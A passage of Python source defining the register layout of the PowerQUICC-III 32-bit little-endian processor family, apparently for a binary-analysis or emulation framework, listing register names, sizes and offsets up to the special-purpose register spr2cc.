description = 'PowerQUICC-III 32-bit little endian family'
bits = 32
ip_offset = 0x780
sp_offset = 0x4
bp_offset = sp_offset
instruction_endness = Endness.LE
register_list = [
Register('r0', 4, 0x0),
Register('r1', 4, 0x4),
Register('r2', 4, 0x8),
Register('r3', 4, 0xc),
Register('r4', 4, 0x10),
Register('r5', 4, 0x14),
Register('r6', 4, 0x18),
Register('r7', 4, 0x1c),
Register('r8', 4, 0x20),
Register('r9', 4, 0x24),
Register('r10', 4, 0x28),
Register('r11', 4, 0x2c),
Register('r12', 4, 0x30),
Register('r13', 4, 0x34),
Register('r14', 4, 0x38),
Register('r15', 4, 0x3c),
Register('r16', 4, 0x40),
Register('r17', 4, 0x44),
Register('r18', 4, 0x48),
Register('r19', 4, 0x4c),
Register('r20', 4, 0x50),
Register('r21', 4, 0x54),
Register('r22', 4, 0x58),
Register('r23', 4, 0x5c),
Register('r24', 4, 0x60),
Register('r25', 4, 0x64),
Register('r26', 4, 0x68),
Register('r27', 4, 0x6c),
Register('r28', 4, 0x70),
Register('r29', 4, 0x74),
Register('r30', 4, 0x78),
Register('r31', 4, 0x7c),
Register('xer_so', 1, 0x400),
Register('xer_ov', 1, 0x401),
Register('xer_ov32', 1, 0x402),
Register('xer_ca', 1, 0x403),
Register('xer_ca32', 1, 0x404),
Register('xer_count', 1, 0x405),
Register('fp_fx', 1, 0x500),
Register('fp_fex', 1, 0x501),
Register('fp_vx', 1, 0x502),
Register('fp_ox', 1, 0x503),
Register('fp_ux', 1, 0x504),
Register('fp_zx', 1, 0x505),
Register('fp_xx', 1, 0x506),
Register('fp_vxsnan', 1, 0x507),
Register('fp_vxisi', 1, 0x508),
Register('fp_vxidi', 1, 0x509),
Register('fp_vxzdz', 1, 0x50a),
Register('fp_vximz', 1, 0x50b),
Register('fp_vxvc', 1, 0x50c),
Register('fp_fr', 1, 0x50d),
Register('fp_fi', 1, 0x50e),
Register('fp_c', 1, 0x50f),
Register('fp_cc0', 1, 0x510),
Register('fp_cc1', 1, 0x511),
Register('fp_cc2', 1, 0x512),
Register('fp_cc3', 1, 0x513),
Register('fp_reserve1', 1, 0x514),
Register('fp_vxsoft', 1, 0x515),
Register('fp_vxsqrt', 1, 0x516),
Register('fp_vxcvi', 1, 0x517),
Register('fp_ve', 1, 0x518),
Register('fp_oe', 1, 0x519),
Register('fp_ue', 1, 0x51a),
Register('fp_ze', 1, 0x51b),
Register('fp_xe', 1, 0x51c),
Register('fp_ni', 1, 0x51d),
Register('fp_rn0', 1, 0x51e),
Register('fp_rn1', 1, 0x51f),
Register('msr', 4, 0x700),
Register('reserve_address', 4, 0x720),
Register('reserve', 1, 0x728),
Register('reserve_length', 1, 0x730),
Register('pc', 4, 0x780, alias_names=('ip',)),
Register('sr0', 4, 0x800),
Register('sr1', 4, 0x804),
Register('sr2', 4, 0x808),
Register('sr3', 4, 0x80c),
Register('sr4', 4, 0x810),
Register('sr5', 4, 0x814),
Register('sr6', 4, 0x818),
Register('sr7', 4, 0x81c),
Register('sr8', 4, 0x820),
Register('sr9', 4, 0x824),
Register('sr10', 4, 0x828),
Register('sr11', 4, 0x82c),
Register('sr12', 4, 0x830),
Register('sr13', 4, 0x834),
Register('sr14', 4, 0x838),
Register('sr15', 4, 0x83c),
Register('crall', 8, 0x900),
Register('cr0', 1, 0x900),
Register('cr1', 1, 0x901),
Register('cr2', 1, 0x902),
Register('cr3', 1, 0x903),
Register('cr4', 1, 0x904),
Register('cr5', 1, 0x905),
Register('cr6', 1, 0x906),
Register('cr7', 1, 0x907),
Register('tea', 4, 0x980),
Register('r2save', 4, 0x988),
Register('spr000', 4, 0x1000),
Register('xer', 4, 0x1004),
Register('spr002', 4, 0x1008),
Register('spr003', 4, 0x100c),
Register('spr004', 4, 0x1010),
Register('spr005', 4, 0x1014),
Register('spr006', 4, 0x1018),
Register('spr007', 4, 0x101c),
Register('lr', 4, 0x1020),
Register('ctr', 4, 0x1024),
Register('spr00a', 4, 0x1028),
Register('spr00b', 4, 0x102c),
Register('spr00c', 4, 0x1030),
Register('spr00d', 4, 0x1034),
Register('spr00e', 4, 0x1038),
Register('spr00f', 4, 0x103c),
Register('spr010', 4, 0x1040),
Register('spr011', 4, 0x1044),
Register('spr012', 4, 0x1048),
Register('spr013', 4, 0x104c),
Register('spr014', 4, 0x1050),
Register('spr015', 4, 0x1054),
Register('spr016', 4, 0x1058),
Register('spr017', 4, 0x105c),
Register('spr018', 4, 0x1060),
Register('spr019', 4, 0x1064),
Register('srr0', 4, 0x1068),
Register('srr1', 4, 0x106c),
Register('spr01c', 4, 0x1070),
Register('spr01d', 4, 0x1074),
Register('spr01e', 4, 0x1078),
Register('spr01f', 4, 0x107c),
Register('spr020', 4, 0x1080),
Register('spr021', 4, 0x1084),
Register('spr022', 4, 0x1088),
Register('spr023', 4, 0x108c),
Register('spr024', 4, 0x1090),
Register('spr025', 4, 0x1094),
Register('spr026', 4, 0x1098),
Register('spr027', 4, 0x109c),
Register('spr028', 4, 0x10a0),
Register('spr029', 4, 0x10a4),
Register('spr02a', 4, 0x10a8),
Register('spr02b', 4, 0x10ac),
Register('spr02c', 4, 0x10b0),
Register('spr02d', 4, 0x10b4),
Register('spr02e', 4, 0x10b8),
Register('spr02f', 4, 0x10bc),
Register('spr030', 4, 0x10c0),
Register('spr031', 4, 0x10c4),
Register('spr032', 4, 0x10c8),
Register('spr033', 4, 0x10cc),
Register('spr034', 4, 0x10d0),
Register('spr035', 4, 0x10d4),
Register('spr036', 4, 0x10d8),
Register('spr037', 4, 0x10dc),
Register('spr038', 4, 0x10e0),
Register('spr039', 4, 0x10e4),
Register('spr03a', 4, 0x10e8),
Register('spr03b', 4, 0x10ec),
Register('spr03c', 4, 0x10f0),
Register('spr03d', 4, 0x10f4),
Register('spr03e', 4, 0x10f8),
Register('spr03f', 4, 0x10fc),
Register('spr040', 4, 0x1100),
Register('spr041', 4, 0x1104),
Register('spr042', 4, 0x1108),
Register('spr043', 4, 0x110c),
Register('spr044', 4, 0x1110),
Register('spr045', 4, 0x1114),
Register('spr046', 4, 0x1118),
Register('spr047', 4, 0x111c),
Register('spr048', 4, 0x1120),
Register('spr049', 4, 0x1124),
Register('spr04a', 4, 0x1128),
Register('spr04b', 4, 0x112c),
Register('spr04c', 4, 0x1130),
Register('spr04d', 4, 0x1134),
Register('spr04e', 4, 0x1138),
Register('spr04f', 4, 0x113c),
Register('spr050', 4, 0x1140),
Register('spr051', 4, 0x1144),
Register('spr052', 4, 0x1148),
Register('spr053', 4, 0x114c),
Register('spr054', 4, 0x1150),
Register('spr055', 4, 0x1154),
Register('spr056', 4, 0x1158),
Register('spr057', 4, 0x115c),
Register('spr058', 4, 0x1160),
Register('spr059', 4, 0x1164),
Register('spr05a', 4, 0x1168),
Register('spr05b', 4, 0x116c),
Register('spr05c', 4, 0x1170),
Register('spr05d', 4, 0x1174),
Register('spr05e', 4, 0x1178),
Register('spr05f', 4, 0x117c),
Register('spr060', 4, 0x1180),
Register('spr061', 4, 0x1184),
Register('spr062', 4, 0x1188),
Register('spr063', 4, 0x118c),
Register('spr064', 4, 0x1190),
Register('spr065', 4, 0x1194),
Register('spr066', 4, 0x1198),
Register('spr067', 4, 0x119c),
Register('spr068', 4, 0x11a0),
Register('spr069', 4, 0x11a4),
Register('spr06a', 4, 0x11a8),
Register('spr06b', 4, 0x11ac),
Register('spr06c', 4, 0x11b0),
Register('spr06d', 4, 0x11b4),
Register('spr06e', 4, 0x11b8),
Register('spr06f', 4, 0x11bc),
Register('spr070', 4, 0x11c0),
Register('spr071', 4, 0x11c4),
Register('spr072', 4, 0x11c8),
Register('spr073', 4, 0x11cc),
Register('spr074', 4, 0x11d0),
Register('spr075', 4, 0x11d4),
Register('spr076', 4, 0x11d8),
Register('spr077', 4, 0x11dc),
Register('spr078', 4, 0x11e0),
Register('spr079', 4, 0x11e4),
Register('spr07a', 4, 0x11e8),
Register('spr07b', 4, 0x11ec),
Register('spr07c', 4, 0x11f0),
Register('spr07d', 4, 0x11f4),
Register('spr07e', 4, 0x11f8),
Register('spr07f', 4, 0x11fc),
Register('spr080', 4, 0x1200),
Register('spr081', 4, 0x1204),
Register('spr082', 4, 0x1208),
Register('spr083', 4, 0x120c),
Register('spr084', 4, 0x1210),
Register('spr085', 4, 0x1214),
Register('spr086', 4, 0x1218),
Register('spr087', 4, 0x121c),
Register('spr088', 4, 0x1220),
Register('spr089', 4, 0x1224),
Register('spr08a', 4, 0x1228),
Register('spr08b', 4, 0x122c),
Register('spr08c', 4, 0x1230),
Register('spr08d', 4, 0x1234),
Register('spr08e', 4, 0x1238),
Register('spr08f', 4, 0x123c),
Register('spr090', 4, 0x1240),
Register('spr091', 4, 0x1244),
Register('spr092', 4, 0x1248),
Register('spr093', 4, 0x124c),
Register('spr094', 4, 0x1250),
Register('spr095', 4, 0x1254),
Register('spr096', 4, 0x1258),
Register('spr097', 4, 0x125c),
Register('spr098', 4, 0x1260),
Register('spr099', 4, 0x1264),
Register('spr09a', 4, 0x1268),
Register('spr09b', 4, 0x126c),
Register('spr09c', 4, 0x1270),
Register('spr09d', 4, 0x1274),
Register('spr09e', 4, 0x1278),
Register('spr09f', 4, 0x127c),
Register('spr0a0', 4, 0x1280),
Register('spr0a1', 4, 0x1284),
Register('spr0a2', 4, 0x1288),
Register('spr0a3', 4, 0x128c),
Register('spr0a4', 4, 0x1290),
Register('spr0a5', 4, 0x1294),
Register('spr0a6', 4, 0x1298),
Register('spr0a7', 4, 0x129c),
Register('spr0a8', 4, 0x12a0),
Register('spr0a9', 4, 0x12a4),
Register('spr0aa', 4, 0x12a8),
Register('spr0ab', 4, 0x12ac),
Register('spr0ac', 4, 0x12b0),
Register('spr0ad', 4, 0x12b4),
Register('spr0ae', 4, 0x12b8),
Register('spr0af', 4, 0x12bc),
Register('spr0b0', 4, 0x12c0),
Register('spr0b1', 4, 0x12c4),
Register('spr0b2', 4, 0x12c8),
Register('spr0b3', 4, 0x12cc),
Register('spr0b4', 4, 0x12d0),
Register('spr0b5', 4, 0x12d4),
Register('spr0b6', 4, 0x12d8),
Register('spr0b7', 4, 0x12dc),
Register('spr0b8', 4, 0x12e0),
Register('spr0b9', 4, 0x12e4),
Register('spr0ba', 4, 0x12e8),
Register('spr0bb', 4, 0x12ec),
Register('spr0bc', 4, 0x12f0),
Register('spr0bd', 4, 0x12f4),
Register('spr0be', 4, 0x12f8),
Register('spr0bf', 4, 0x12fc),
Register('spr0c0', 4, 0x1300),
Register('spr0c1', 4, 0x1304),
Register('spr0c2', 4, 0x1308),
Register('spr0c3', 4, 0x130c),
Register('spr0c4', 4, 0x1310),
Register('spr0c5', 4, 0x1314),
Register('spr0c6', 4, 0x1318),
Register('spr0c7', 4, 0x131c),
Register('spr0c8', 4, 0x1320),
Register('spr0c9', 4, 0x1324),
Register('spr0ca', 4, 0x1328),
Register('spr0cb', 4, 0x132c),
Register('spr0cc', 4, 0x1330),
Register('spr0cd', 4, 0x1334),
Register('spr0ce', 4, 0x1338),
Register('spr0cf', 4, 0x133c),
Register('spr0d0', 4, 0x1340),
Register('spr0d1', 4, 0x1344),
Register('spr0d2', 4, 0x1348),
Register('spr0d3', 4, 0x134c),
Register('spr0d4', 4, 0x1350),
Register('spr0d5', 4, 0x1354),
Register('spr0d6', 4, 0x1358),
Register('spr0d7', 4, 0x135c),
Register('spr0d8', 4, 0x1360),
Register('spr0d9', 4, 0x1364),
Register('spr0da', 4, 0x1368),
Register('spr0db', 4, 0x136c),
Register('spr0dc', 4, 0x1370),
Register('spr0dd', 4, 0x1374),
Register('spr0de', 4, 0x1378),
Register('spr0df', 4, 0x137c),
Register('spr0e0', 4, 0x1380),
Register('spr0e1', 4, 0x1384),
Register('spr0e2', 4, 0x1388),
Register('spr0e3', 4, 0x138c),
Register('spr0e4', 4, 0x1390),
Register('spr0e5', 4, 0x1394),
Register('spr0e6', 4, 0x1398),
Register('spr0e7', 4, 0x139c),
Register('spr0e8', 4, 0x13a0),
Register('spr0e9', 4, 0x13a4),
Register('spr0ea', 4, 0x13a8),
Register('spr0eb', 4, 0x13ac),
Register('spr0ec', 4, 0x13b0),
Register('spr0ed', 4, 0x13b4),
Register('spr0ee', 4, 0x13b8),
Register('spr0ef', 4, 0x13bc),
Register('spr0f0', 4, 0x13c0),
Register('spr0f1', 4, 0x13c4),
Register('spr0f2', 4, 0x13c8),
Register('spr0f3', 4, 0x13cc),
Register('spr0f4', 4, 0x13d0),
Register('spr0f5', 4, 0x13d4),
Register('spr0f6', 4, 0x13d8),
Register('spr0f7', 4, 0x13dc),
Register('spr0f8', 4, 0x13e0),
Register('spr0f9', 4, 0x13e4),
Register('spr0fa', 4, 0x13e8),
Register('spr0fb', 4, 0x13ec),
Register('spr0fc', 4, 0x13f0),
Register('spr0fd', 4, 0x13f4),
Register('spr0fe', 4, 0x13f8),
Register('spr0ff', 4, 0x13fc),
Register('spr100', 4, 0x1400),
Register('spr101', 4, 0x1404),
Register('spr102', 4, 0x1408),
Register('spr103', 4, 0x140c),
Register('spr104', 4, 0x1410),
Register('spr105', 4, 0x1414),
Register('spr106', 4, 0x1418),
Register('spr107', 4, 0x141c),
Register('spr108', 4, 0x1420),
Register('spr109', 4, 0x1424),
Register('spr10a', 4, 0x1428),
Register('spr10b', 4, 0x142c),
Register('tblr', 4, 0x1430),
Register('tbur', 4, 0x1434),
Register('spr10e', 4, 0x1438),
Register('spr10f', 4, 0x143c),
Register('spr110', 4, 0x1440),
Register('spr111', 4, 0x1444),
Register('spr112', 4, 0x1448),
Register('spr113', 4, 0x144c),
Register('spr114', 4, 0x1450),
Register('spr115', 4, 0x1454),
Register('spr116', 4, 0x1458),
Register('spr117', 4, 0x145c),
Register('spr118', 4, 0x1460),
Register('spr119', 4, 0x1464),
Register('spr11a', 4, 0x1468),
Register('spr11b', 4, 0x146c),
Register('tblw', 4, 0x1470),
Register('tbuw', 4, 0x1474),
Register('spr11e', 4, 0x1478),
Register('spr11f', 4, 0x147c),
Register('spr120', 4, 0x1480),
Register('spr121', 4, 0x1484),
Register('spr122', 4, 0x1488),
Register('spr123', 4, 0x148c),
Register('spr124', 4, 0x1490),
Register('spr125', 4, 0x1494),
Register('spr126', 4, 0x1498),
Register('spr127', 4, 0x149c),
Register('spr128', 4, 0x14a0),
Register('spr129', 4, 0x14a4),
Register('spr12a', 4, 0x14a8),
Register('spr12b', 4, 0x14ac),
Register('spr12c', 4, 0x14b0),
Register('spr12d', 4, 0x14b4),
Register('spr12e', 4, 0x14b8),
Register('spr12f', 4, 0x14bc),
Register('spr130', 4, 0x14c0),
Register('spr131', 4, 0x14c4),
Register('spr132', 4, 0x14c8),
Register('spr133', 4, 0x14cc),
Register('spr134', 4, 0x14d0),
Register('spr135', 4, 0x14d4),
Register('spr136', 4, 0x14d8),
Register('spr137', 4, 0x14dc),
Register('spr138', 4, 0x14e0),
Register('spr139', 4, 0x14e4),
Register('spr13a', 4, 0x14e8),
Register('spr13b', 4, 0x14ec),
Register('spr13c', 4, 0x14f0),
Register('spr13d', 4, 0x14f4),
Register('spr13e', 4, 0x14f8),
Register('spr13f', 4, 0x14fc),
Register('spr140', 4, 0x1500),
Register('spr141', 4, 0x1504),
Register('spr142', 4, 0x1508),
Register('spr143', 4, 0x150c),
Register('spr144', 4, 0x1510),
Register('spr145', 4, 0x1514),
Register('spr146', 4, 0x1518),
Register('spr147', 4, 0x151c),
Register('spr148', 4, 0x1520),
Register('spr149', 4, 0x1524),
Register('spr14a', 4, 0x1528),
Register('spr14b', 4, 0x152c),
Register('spr14c', 4, 0x1530),
Register('spr14d', 4, 0x1534),
Register('spr14e', 4, 0x1538),
Register('spr14f', 4, 0x153c),
Register('spr150', 4, 0x1540),
Register('spr151', 4, 0x1544),
Register('spr152', 4, 0x1548),
Register('spr153', 4, 0x154c),
Register('spr154', 4, 0x1550),
Register('spr155', 4, 0x1554),
Register('spr156', 4, 0x1558),
Register('spr157', 4, 0x155c),
Register('spr158', 4, 0x1560),
Register('spr159', 4, 0x1564),
Register('spr15a', 4, 0x1568),
Register('spr15b', 4, 0x156c),
Register('spr15c', 4, 0x1570),
Register('spr15d', 4, 0x1574),
Register('spr15e', 4, 0x1578),
Register('spr15f', 4, 0x157c),
Register('spr160', 4, 0x1580),
Register('spr161', 4, 0x1584),
Register('spr162', 4, 0x1588),
Register('spr163', 4, 0x158c),
Register('spr164', 4, 0x1590),
Register('spr165', 4, 0x1594),
Register('spr166', 4, 0x1598),
Register('spr167', 4, 0x159c),
Register('spr168', 4, 0x15a0),
Register('spr169', 4, 0x15a4),
Register('spr16a', 4, 0x15a8),
Register('spr16b', 4, 0x15ac),
Register('spr16c', 4, 0x15b0),
Register('spr16d', 4, 0x15b4),
Register('spr16e', 4, 0x15b8),
Register('spr16f', 4, 0x15bc),
Register('spr170', 4, 0x15c0),
Register('spr171', 4, 0x15c4),
Register('spr172', 4, 0x15c8),
Register('spr173', 4, 0x15cc),
Register('spr174', 4, 0x15d0),
Register('spr175', 4, 0x15d4),
Register('spr176', 4, 0x15d8),
Register('spr177', 4, 0x15dc),
Register('spr178', 4, 0x15e0),
Register('spr179', 4, 0x15e4),
Register('spr17a', 4, 0x15e8),
Register('spr17b', 4, 0x15ec),
Register('spr17c', 4, 0x15f0),
Register('spr17d', 4, 0x15f4),
Register('spr17e', 4, 0x15f8),
Register('spr17f', 4, 0x15fc),
Register('spr180', 4, 0x1600),
Register('spr181', 4, 0x1604),
Register('spr182', 4, 0x1608),
Register('spr183', 4, 0x160c),
Register('spr184', 4, 0x1610),
Register('spr185', 4, 0x1614),
Register('spr186', 4, 0x1618),
Register('spr187', 4, 0x161c),
Register('spr188', 4, 0x1620),
Register('spr189', 4, 0x1624),
Register('spr18a', 4, 0x1628),
Register('spr18b', 4, 0x162c),
Register('spr18c', 4, 0x1630),
Register('spr18d', 4, 0x1634),
Register('spr18e', 4, 0x1638),
Register('spr18f', 4, 0x163c),
Register('spr190', 4, 0x1640),
Register('spr191', 4, 0x1644),
Register('spr192', 4, 0x1648),
Register('spr193', 4, 0x164c),
Register('spr194', 4, 0x1650),
Register('spr195', 4, 0x1654),
Register('spr196', 4, 0x1658),
Register('spr197', 4, 0x165c),
Register('spr198', 4, 0x1660),
Register('spr199', 4, 0x1664),
Register('spr19a', 4, 0x1668),
Register('spr19b', 4, 0x166c),
Register('spr19c', 4, 0x1670),
Register('spr19d', 4, 0x1674),
Register('spr19e', 4, 0x1678),
Register('spr19f', 4, 0x167c),
Register('spr1a0', 4, 0x1680),
Register('spr1a1', 4, 0x1684),
Register('spr1a2', 4, 0x1688),
Register('spr1a3', 4, 0x168c),
Register('spr1a4', 4, 0x1690),
Register('spr1a5', 4, 0x1694),
Register('spr1a6', 4, 0x1698),
Register('spr1a7', 4, 0x169c),
Register('spr1a8', 4, 0x16a0),
Register('spr1a9', 4, 0x16a4),
Register('spr1aa', 4, 0x16a8),
Register('spr1ab', 4, 0x16ac),
Register('spr1ac', 4, 0x16b0),
Register('spr1ad', 4, 0x16b4),
Register('spr1ae', 4, 0x16b8),
Register('spr1af', 4, 0x16bc),
Register('spr1b0', 4, 0x16c0),
Register('spr1b1', 4, 0x16c4),
Register('spr1b2', 4, 0x16c8),
Register('spr1b3', 4, 0x16cc),
Register('spr1b4', 4, 0x16d0),
Register('spr1b5', 4, 0x16d4),
Register('spr1b6', 4, 0x16d8),
Register('spr1b7', 4, 0x16dc),
Register('spr1b8', 4, 0x16e0),
Register('spr1b9', 4, 0x16e4),
Register('spr1ba', 4, 0x16e8),
Register('spr1bb', 4, 0x16ec),
Register('spr1bc', 4, 0x16f0),
Register('spr1bd', 4, 0x16f4),
Register('spr1be', 4, 0x16f8),
Register('spr1bf', 4, 0x16fc),
Register('spr1c0', 4, 0x1700),
Register('spr1c1', 4, 0x1704),
Register('spr1c2', 4, 0x1708),
Register('spr1c3', 4, 0x170c),
Register('spr1c4', 4, 0x1710),
Register('spr1c5', 4, 0x1714),
Register('spr1c6', 4, 0x1718),
Register('spr1c7', 4, 0x171c),
Register('spr1c8', 4, 0x1720),
Register('spr1c9', 4, 0x1724),
Register('spr1ca', 4, 0x1728),
Register('spr1cb', 4, 0x172c),
Register('spr1cc', 4, 0x1730),
Register('spr1cd', 4, 0x1734),
Register('spr1ce', 4, 0x1738),
Register('spr1cf', 4, 0x173c),
Register('spr1d0', 4, 0x1740),
Register('spr1d1', 4, 0x1744),
Register('spr1d2', 4, 0x1748),
Register('spr1d3', 4, 0x174c),
Register('spr1d4', 4, 0x1750),
Register('spr1d5', 4, 0x1754),
Register('spr1d6', 4, 0x1758),
Register('spr1d7', 4, 0x175c),
Register('spr1d8', 4, 0x1760),
Register('spr1d9', 4, 0x1764),
Register('spr1da', 4, 0x1768),
Register('spr1db', 4, 0x176c),
Register('spr1dc', 4, 0x1770),
Register('spr1dd', 4, 0x1774),
Register('spr1de', 4, 0x1778),
Register('spr1df', 4, 0x177c),
Register('spr1e0', 4, 0x1780),
Register('spr1e1', 4, 0x1784),
Register('spr1e2', 4, 0x1788),
Register('spr1e3', 4, 0x178c),
Register('spr1e4', 4, 0x1790),
Register('spr1e5', 4, 0x1794),
Register('spr1e6', 4, 0x1798),
Register('spr1e7', 4, 0x179c),
Register('spr1e8', 4, 0x17a0),
Register('spr1e9', 4, 0x17a4),
Register('spr1ea', 4, 0x17a8),
Register('spr1eb', 4, 0x17ac),
Register('spr1ec', 4, 0x17b0),
Register('spr1ed', 4, 0x17b4),
Register('spr1ee', 4, 0x17b8),
Register('spr1ef', 4, 0x17bc),
Register('spr1f0', 4, 0x17c0),
Register('spr1f1', 4, 0x17c4),
Register('spr1f2', 4, 0x17c8),
Register('spr1f3', 4, 0x17cc),
Register('spr1f4', 4, 0x17d0),
Register('spr1f5', 4, 0x17d4),
Register('spr1f6', 4, 0x17d8),
Register('spr1f7', 4, 0x17dc),
Register('spr1f8', 4, 0x17e0),
Register('spr1f9', 4, 0x17e4),
Register('spr1fa', 4, 0x17e8),
Register('spr1fb', 4, 0x17ec),
Register('spr1fc', 4, 0x17f0),
Register('spr1fd', 4, 0x17f4),
Register('spr1fe', 4, 0x17f8),
Register('spr1ff', 4, 0x17fc),
Register('spr200', 4, 0x1800),
Register('spr201', 4, 0x1804),
Register('spr202', 4, 0x1808),
Register('spr203', 4, 0x180c),
Register('spr204', 4, 0x1810),
Register('spr205', 4, 0x1814),
Register('spr206', 4, 0x1818),
Register('spr207', 4, 0x181c),
Register('spr208', 4, 0x1820),
Register('spr209', 4, 0x1824),
Register('spr20a', 4, 0x1828),
Register('spr20b', 4, 0x182c),
Register('spr20c', 4, 0x1830),
Register('spr20d', 4, 0x1834),
Register('spr20e', 4, 0x1838),
Register('spr20f', 4, 0x183c),
Register('spr210', 4, 0x1840),
Register('spr211', 4, 0x1844),
Register('spr212', 4, 0x1848),
Register('spr213', 4, 0x184c),
Register('spr214', 4, 0x1850),
Register('spr215', 4, 0x1854),
Register('spr216', 4, 0x1858),
Register('spr217', 4, 0x185c),
Register('spr218', 4, 0x1860),
Register('spr219', 4, 0x1864),
Register('spr21a', 4, 0x1868),
Register('spr21b', 4, 0x186c),
Register('spr21c', 4, 0x1870),
Register('spr21d', 4, 0x1874),
Register('spr21e', 4, 0x1878),
Register('spr21f', 4, 0x187c),
Register('spr220', 4, 0x1880),
Register('spr221', 4, 0x1884),
Register('spr222', 4, 0x1888),
Register('spr223', 4, 0x188c),
Register('spr224', 4, 0x1890),
Register('spr225', 4, 0x1894),
Register('spr226', 4, 0x1898),
Register('spr227', 4, 0x189c),
Register('spr228', 4, 0x18a0),
Register('spr229', 4, 0x18a4),
Register('spr22a', 4, 0x18a8),
Register('spr22b', 4, 0x18ac),
Register('spr22c', 4, 0x18b0),
Register('spr22d', 4, 0x18b4),
Register('spr22e', 4, 0x18b8),
Register('spr22f', 4, 0x18bc),
Register('spr230', 4, 0x18c0),
Register('spr231', 4, 0x18c4),
Register('spr232', 4, 0x18c8),
Register('spr233', 4, 0x18cc),
Register('spr234', 4, 0x18d0),
Register('spr235', 4, 0x18d4),
Register('spr236', 4, 0x18d8),
Register('spr237', 4, 0x18dc),
Register('spr238', 4, 0x18e0),
Register('spr239', 4, 0x18e4),
Register('spr23a', 4, 0x18e8),
Register('spr23b', 4, 0x18ec),
Register('spr23c', 4, 0x18f0),
Register('spr23d', 4, 0x18f4),
Register('spr23e', 4, 0x18f8),
Register('spr23f', 4, 0x18fc),
Register('spr240', 4, 0x1900),
Register('spr241', 4, 0x1904),
Register('spr242', 4, 0x1908),
Register('spr243', 4, 0x190c),
Register('spr244', 4, 0x1910),
Register('spr245', 4, 0x1914),
Register('spr246', 4, 0x1918),
Register('spr247', 4, 0x191c),
Register('spr248', 4, 0x1920),
Register('spr249', 4, 0x1924),
Register('spr24a', 4, 0x1928),
Register('spr24b', 4, 0x192c),
Register('spr24c', 4, 0x1930),
Register('spr24d', 4, 0x1934),
Register('spr24e', 4, 0x1938),
Register('spr24f', 4, 0x193c),
Register('spr250', 4, 0x1940),
Register('spr251', 4, 0x1944),
Register('spr252', 4, 0x1948),
Register('spr253', 4, 0x194c),
Register('spr254', 4, 0x1950),
Register('spr255', 4, 0x1954),
Register('spr256', 4, 0x1958),
Register('spr257', 4, 0x195c),
Register('spr258', 4, 0x1960),
Register('spr259', 4, 0x1964),
Register('spr25a', 4, 0x1968),
Register('spr25b', 4, 0x196c),
Register('spr25c', 4, 0x1970),
Register('spr25d', 4, 0x1974),
Register('spr25e', 4, 0x1978),
Register('spr25f', 4, 0x197c),
Register('spr260', 4, 0x1980),
Register('spr261', 4, 0x1984),
Register('spr262', 4, 0x1988),
Register('spr263', 4, 0x198c),
Register('spr264', 4, 0x1990),
Register('spr265', 4, 0x1994),
Register('spr266', 4, 0x1998),
Register('spr267', 4, 0x199c),
Register('spr268', 4, 0x19a0),
Register('spr269', 4, 0x19a4),
Register('spr26a', 4, 0x19a8),
Register('spr26b', 4, 0x19ac),
Register('spr26c', 4, 0x19b0),
Register('spr26d', 4, 0x19b4),
Register('spr26e', 4, 0x19b8),
Register('spr26f', 4, 0x19bc),
Register('spr270', 4, 0x19c0),
Register('spr271', 4, 0x19c4),
Register('spr272', 4, 0x19c8),
Register('spr273', 4, 0x19cc),
Register('spr274', 4, 0x19d0),
Register('spr275', 4, 0x19d4),
Register('spr276', 4, 0x19d8),
Register('spr277', 4, 0x19dc),
Register('spr278', 4, 0x19e0),
Register('spr279', 4, 0x19e4),
Register('spr27a', 4, 0x19e8),
Register('spr27b', 4, 0x19ec),
Register('spr27c', 4, 0x19f0),
Register('spr27d', 4, 0x19f4),
Register('spr27e', 4, 0x19f8),
Register('spr27f', 4, 0x19fc),
Register('spr280', 4, 0x1a00),
Register('spr281', 4, 0x1a04),
Register('spr282', 4, 0x1a08),
Register('spr283', 4, 0x1a0c),
Register('spr284', 4, 0x1a10),
Register('spr285', 4, 0x1a14),
Register('spr286', 4, 0x1a18),
Register('spr287', 4, 0x1a1c),
Register('spr288', 4, 0x1a20),
Register('spr289', 4, 0x1a24),
Register('spr28a', 4, 0x1a28),
Register('spr28b', 4, 0x1a2c),
Register('spr28c', 4, 0x1a30),
Register('spr28d', 4, 0x1a34),
Register('spr28e', 4, 0x1a38),
Register('spr28f', 4, 0x1a3c),
Register('spr290', 4, 0x1a40),
Register('spr291', 4, 0x1a44),
Register('spr292', 4, 0x1a48),
Register('spr293', 4, 0x1a4c),
Register('spr294', 4, 0x1a50),
Register('spr295', 4, 0x1a54),
Register('spr296', 4, 0x1a58),
Register('spr297', 4, 0x1a5c),
Register('spr298', 4, 0x1a60),
Register('spr299', 4, 0x1a64),
Register('spr29a', 4, 0x1a68),
Register('spr29b', 4, 0x1a6c),
Register('spr29c', 4, 0x1a70),
Register('spr29d', 4, 0x1a74),
Register('spr29e', 4, 0x1a78),
Register('spr29f', 4, 0x1a7c),
Register('spr2a0', 4, 0x1a80),
Register('spr2a1', 4, 0x1a84),
Register('spr2a2', 4, 0x1a88),
Register('spr2a3', 4, 0x1a8c),
Register('spr2a4', 4, 0x1a90),
Register('spr2a5', 4, 0x1a94),
Register('spr2a6', 4, 0x1a98),
Register('spr2a7', 4, 0x1a9c),
Register('spr2a8', 4, 0x1aa0),
Register('spr2a9', 4, 0x1aa4),
Register('spr2aa', 4, 0x1aa8),
Register('spr2ab', 4, 0x1aac),
Register('spr2ac', 4, 0x1ab0),
Register('spr2ad', 4, 0x1ab4),
Register('spr2ae', 4, 0x1ab8),
Register('spr2af', 4, 0x1abc),
Register('spr2b0', 4, 0x1ac0),
Register('spr2b1', 4, 0x1ac4),
Register('spr2b2', 4, 0x1ac8),
Register('spr2b3', 4, 0x1acc),
Register('spr2b4', 4, 0x1ad0),
Register('spr2b5', 4, 0x1ad4),
Register('spr2b6', 4, 0x1ad8),
Register('spr2b7', 4, 0x1adc),
Register('spr2b8', 4, 0x1ae0),
Register('spr2b9', 4, 0x1ae4),
Register('spr2ba', 4, 0x1ae8),
Register('spr2bb', 4, 0x1aec),
Register('spr2bc', 4, 0x1af0),
Register('spr2bd', 4, 0x1af4),
Register('spr2be', 4, 0x1af8),
Register('spr2bf', 4, 0x1afc),
Register('spr2c0', 4, 0x1b00),
Register('spr2c1', 4, 0x1b04),
Register('spr2c2', 4, 0x1b08),
Register('spr2c3', 4, 0x1b0c),
Register('spr2c4', 4, 0x1b10),
Register('spr2c5', 4, 0x1b14),
Register('spr2c6', 4, 0x1b18),
Register('spr2c7', 4, 0x1b1c),
Register('spr2c8', 4, 0x1b20),
Register('spr2c9', 4, 0x1b24),
Register('spr2ca', 4, 0x1b28),
Register('spr2cb', 4, 0x1b2c),
Register('spr2cc', 4, 0x1b30),
